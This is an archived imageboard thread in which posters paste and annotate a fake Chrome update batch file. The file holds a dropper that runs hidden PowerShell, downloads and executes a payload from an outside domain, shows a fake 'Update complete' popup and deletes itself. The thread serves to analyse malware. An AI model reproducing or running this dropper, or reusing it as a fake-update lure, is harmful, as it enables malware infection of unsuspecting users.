[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

fake chrome update

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 9
Thread images: 2

File: chrome-bat.jpg (55KB, 1600x840px) Image search: [Google]
chrome-bat.jpg
55KB, 1600x840px
So did anyone try finding out what chrome-update.bat does in sandbox/VM?
>>
Open it an a fucking text editor, retard.
>>
Please anon don't be this retarded don't set a standard
>>
>>55706937
Well then explain what it does

@echo off
echo a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe';(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); >"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0
>>
>>55707099
Downloads a .DAT file and then runs it you fucking moron. It gives you a nice little window saying update complete when the .DAT is finished running....it even tells you the site it downloads from
>>
>>55707099
Why are you even trying to analyze malware if you can't understand this code?
>>
>>55707099
@echo off
echo a=new ActiveXObject('Wscript.Shell'); ' var new object for "explorer access" (run an exe, change regedit, open folders, ect)
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe'; ' exe powershell to create file
(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d); 'calling to said download file
Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); 'exe said downloaded file
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); 'fake popup addressing "update"
>"%temp%\install_flash.js" 'file from downloaded file
start /min "" wscript.exe "%temp%\install_flash.js" 'exe newly downloaded file from "1eb50823ee917ba6651ef6f1ca977bcb.exe"
DEL "%~f0 'erase tracks
>>
>>55707243

@echo off


Turn off output.

echo a=new ActiveXObject('Wscript.Shell');


var new object for "explorer access" (run an exe, change regedit, open folders, ect)

a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\1eb50823ee917ba6651ef6f1ca977bcb.exe';


exe powershell to create null file

(New-Object System.Net.WebClient).DownloadFile('https: // eeteeinsightsoft . org/17/524.dat',$d);


calling to dl file to "fill" the new null file

Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');


exe said downloaded file

[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);


Popup addressing an "update"

>"%temp%\install_flash.js"


file from downloaded file

start /min "" wscript.exe "%temp%\install_flash.js"


exe newly downloaded file from "1eb50823ee917ba6651ef6f1ca977bcb.exe"

DEL "%~f0

erase tracks
>>
File: jeff'd.jpg (25KB, 412x384px) Image search: [Google]
jeff'd.jpg
25KB, 412x384px
>>55707328
You missed a code tag
Thread posts: 9
Thread images: 2


[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/


If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.